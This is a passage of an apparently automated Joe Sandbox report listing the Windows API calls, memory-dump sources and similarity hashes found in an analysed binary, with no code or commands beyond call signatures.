                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00764C2B,?,?,?,?,0076BE63), ref: 00764BB6
                                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00764C2B,?,?,?,?,0076BE63), ref: 007D4972
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                        • Opcode ID: 791e7be7f86a2e9e18e98884089e7631fb1fd083f1d29bda5d49ab154d8272f2
                                                                                                                                        • Instruction ID: fb7339be0e3304e2ef1d302ca565747d0da0cb363eeec58de07b8b85725b6364
                                                                                                                                        • Opcode Fuzzy Hash: 791e7be7f86a2e9e18e98884089e7631fb1fd083f1d29bda5d49ab154d8272f2
                                                                                                                                        • Instruction Fuzzy Hash: F00152B0248308BEF7344E24CCCAF767BDCEB05768F108359BAE95A1E0C6B95C458B54
                                                                                                                                        APIs
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,007AAEA5,?,?,00000000,00000008), ref: 0077F282
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,007AAEA5,?,?,00000000,00000008), ref: 0077F2A6
                                                                                                                                          • Part of subcall function 0077F2D0: _memmove.LIBCMT ref: 0077F307
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3033907384-0
                                                                                                                                        • Opcode ID: e82f3cd362aff6d6d6406cf8881c6b03f16a8e0e2a9445bf4879b4ab3bc694bc
                                                                                                                                        • Instruction ID: c1896ec304aa25f847df53a2c7036af33655967f2dde670a6097caa766fa4d91
                                                                                                                                        • Opcode Fuzzy Hash: e82f3cd362aff6d6d6406cf8881c6b03f16a8e0e2a9445bf4879b4ab3bc694bc
                                                                                                                                        • Instruction Fuzzy Hash: 31F031B6504114BFAB10AF659C88C7B7B9DEF4A3A07108026FD08CA111CA35DC00C6B4
                                                                                                                                        APIs
                                                                                                                                        • ___lock_fhandle.LIBCMT ref: 0078F7D9
                                                                                                                                        • __close_nolock.LIBCMT ref: 0078F7F2
                                                                                                                                          • Part of subcall function 0078886A: __getptd_noexit.LIBCMT ref: 0078886A
                                                                                                                                          • Part of subcall function 0078889E: __getptd_noexit.LIBCMT ref: 0078889E
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1046115767-0
                                                                                                                                        APIs
                                                                                                                                        • send.WS2_32(00000000,?,00000000,00000000), ref: 007B9534
                                                                                                                                        • WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 007B9557
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastsend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1802528911-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0078889E: __getptd_noexit.LIBCMT ref: 0078889E
                                                                                                                                        • __lock_file.LIBCMT ref: 007842B9
                                                                                                                                          • Part of subcall function 00785A9F: __lock.LIBCMT ref: 00785AC2
                                                                                                                                        • __fclose_nolock.LIBCMT ref: 007842C4
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2800547568-0
                                                                                                                                        APIs
                                                                                                                                        • closesocket.WS2_32(00000000), ref: 007B90E7
                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 007B90F3
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastclosesocket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1278161333-0
                                                                                                                                        APIs
                                                                                                                                        • timeGetTime.WINMM ref: 0077F57A
                                                                                                                                          • Part of subcall function 0076E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0076E279
                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 007D75D3
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePeekSleepTimetime
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1792118007-0
                                                                                                                                        APIs
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                        APIs
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClearVariant
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                        • Opcode ID: d7fa6e4996d02662b5dabebed2188796295c26d700fe4fb8fdd933a27571d709
                                                                                                                                        • Instruction ID: b555ae8cce2283e65e1adfce948bc7da919be0943857b908745f2a9b438e210e
                                                                                                                                        • Opcode Fuzzy Hash: d7fa6e4996d02662b5dabebed2188796295c26d700fe4fb8fdd933a27571d709
                                                                                                                                        • Instruction Fuzzy Hash: 35415C34900509DFCF10DF48C488AA9B7B1FB05390F98C526E84D9B265D73DEE96DB91
                                                                                                                                        APIs
                                                                                                                                        • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00764F8F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FilePointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 973152223-0
                                                                                                                                        • Opcode ID: 6f2d05c3fc10864383ca8d9664a3346b642d924627380c64173ccb084587c9a5
                                                                                                                                        • Instruction ID: ec23c65b22e3bb214aa37e6ba0e2741c116fba75b141b6eb7b127fc5d7c5759d
                                                                                                                                        • Opcode Fuzzy Hash: 6f2d05c3fc10864383ca8d9664a3346b642d924627380c64173ccb084587c9a5
                                                                                                                                        • Instruction Fuzzy Hash: A9314A31A0061AEFCB18DF6DD484AADB7B5BF48310F188629EC1A97710D778B990CB90
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: select
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1274211008-0
                                                                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                        • Instruction ID: 2ada88cfbf7d8b79bdd34a2d3b4ee97abf2655d35368b367bfdae1735b37be19
                                                                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                        • Instruction Fuzzy Hash: DA310671A04106ABCB08DF58C680A69FBA1FF49384B24C2A5E54DCB255D734EDC1DFD0
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClearVariant
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                        • Opcode ID: d4f30b31e48e61e59155f5d2ea786ece0240700b5c8b73b04d60efb5e3af3cc2
                                                                                                                                        • Instruction ID: 89a48c73e44407c17d08dbecc53dcaf4a5734087e9ffdf5fbb47ffafdf3a379a
                                                                                                                                        • Opcode Fuzzy Hash: d4f30b31e48e61e59155f5d2ea786ece0240700b5c8b73b04d60efb5e3af3cc2
                                                                                                                                        • Instruction Fuzzy Hash: 94415B70504641CFDB24CF18C488B1ABBE1BF45354F1985ACE99A4B362C339EC85CF92
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                        • Opcode ID: 4ade50fab690dc66cd8aad200f87916fcc1089b87d7e4f6814e1e11c55b544f8
                                                                                                                                        • Instruction ID: 75b69c4e0e4f609194b4274133b0a8f3a2d007846d42c0d9cd276821127b62e3
                                                                                                                                        • Opcode Fuzzy Hash: 4ade50fab690dc66cd8aad200f87916fcc1089b87d7e4f6814e1e11c55b544f8
                                                                                                                                        • Instruction Fuzzy Hash: 8B21E4B0A00608EBCF109F51EC486AE7BF9FF56360F22C86EE486D5250EB3895E0D755
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                        • Opcode ID: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                                                                                                                        • Instruction ID: f2e496ff8779f2cdafa2dded7fe2854fab0f14f4c14848237060484bb9f42df4
                                                                                                                                        • Opcode Fuzzy Hash: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                                                                                                                        • Instruction Fuzzy Hash: FE111C75600606DFD724DF28D585916B7E9FF49364720C42EE88ECB661E736E841CB90
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00763F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00763F90
                                                                                                                                          • Part of subcall function 00784129: __wfsopen.LIBCMT ref: 00784134
                                                                                                                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007634E2,?,00000001), ref: 00763FCD
                                                                                                                                          • Part of subcall function 00763E78: FreeLibrary.KERNEL32(00000000), ref: 00763EAB
                                                                                                                                          • Part of subcall function 00764010: _memmove.LIBCMT ref: 0076405A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1396898556-0
                                                                                                                                        • Opcode ID: 92bba4f8ea169b9acd43380fc56ae2a0661a93f04dfc6097b7521dc368affe05
                                                                                                                                        • Instruction ID: bd327375e8d969b7c3188f54defd9dc8d2f3c1170cc7d5b716f30e3ef398b119
                                                                                                                                        • Opcode Fuzzy Hash: 92bba4f8ea169b9acd43380fc56ae2a0661a93f04dfc6097b7521dc368affe05
                                                                                                                                        • Instruction Fuzzy Hash: 54119131600219EADB24AF64DC1AB9E76A9AF50B00F108829F943EB1C1DF7D9E05DB60
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClearVariant
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                        APIs
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                        APIs
                                                                                                                                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,00764E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00764CF7
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                        APIs
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                        APIs
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                        APIs
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                        APIs
                                                                                                                                        • WSAStartup.WS2_32(00000202,?), ref: 007B95C9
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Startup
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 724789610-0
                                                                                                                                        APIs
                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,007634E2,?,00000001), ref: 00763E6D
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                        APIs
                                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 007A7A11
                                                                                                                                          • Part of subcall function 00767E53: _memmove.LIBCMT ref: 00767EB9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FolderPath_memmove
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007A6623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,007A685E,?,?,?,007D4A5C,007FE448,00000003,?,?), ref: 007A66E2
                                                                                                                                        • WriteFile.KERNEL32(?,?,008222E8,00000000,00000000,?,?,?,007D4A5C,007FE448,00000003,?,?,00764C44,?,?), ref: 007A686C
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$PointerWrite
                                                                                                                                        APIs
                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00761952
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSendTimeout
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00761952
                                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0079E3AA
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                                        APIs
                                                                                                                                        Similarity
                                                                                                                                        • API ID: TextWindow
                                                                                                                                        APIs
                                                                                                                                        • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,007D49DA,?,?,00000000), ref: 00764FC4
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FilePointer
                                                                                                                                        APIs
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClearVariant
                                                                                                                                        APIs
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wfsopen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 197181222-0
                                                                                                                                        APIs
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,007D5950), ref: 0076510C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 007CF64E
                                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007CF6AD
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 007CF6EA
                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007CF711
                                                                                                                                        • SendMessageW.USER32 ref: 007CF737
                                                                                                                                        • _wcsncpy.LIBCMT ref: 007CF7A3
                                                                                                                                        • GetKeyState.USER32(00000011), ref: 007CF7C4
                                                                                                                                        • GetKeyState.USER32(00000009), ref: 007CF7D1
                                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007CF7E7
                                                                                                                                        • GetKeyState.USER32(00000010), ref: 007CF7F1
                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007CF820
                                                                                                                                        • SendMessageW.USER32 ref: 007CF843
                                                                                                                                        • SendMessageW.USER32(?,00001030,?,007CDE69), ref: 007CF940
                                                                                                                                        • SetCapture.USER32(?), ref: 007CF970
                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 007CF9D4
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 007CF9FA
                                                                                                                                        • ReleaseCapture.USER32 ref: 007CFA05
                                                                                                                                        • GetCursorPos.USER32(?), ref: 007CFA3A
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 007CFA47
                                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 007CFAA9
                                                                                                                                        • SendMessageW.USER32 ref: 007CFAD3
                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 007CFB12
                                                                                                                                        • SendMessageW.USER32 ref: 007CFB3D
                                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007CFB55
                                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 007CFB60
                                                                                                                                        • GetCursorPos.USER32(?), ref: 007CFB81
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 007CFB8E
                                                                                                                                        • GetParent.USER32(?), ref: 007CFBAA
                                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 007CFC10
                                                                                                                                        • SendMessageW.USER32 ref: 007CFC40
                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 007CFC96
                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007CFCC2
                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 007CFCEA
                                                                                                                                        • SendMessageW.USER32 ref: 007CFD0D
                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 007CFD57
                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007CFD87
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 007CFE1C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                                                                                                        • String ID: @GUI_DRAGID$F
                                                                                                                                        • API String ID: 3461372671-4164748364
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 007CAFDB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
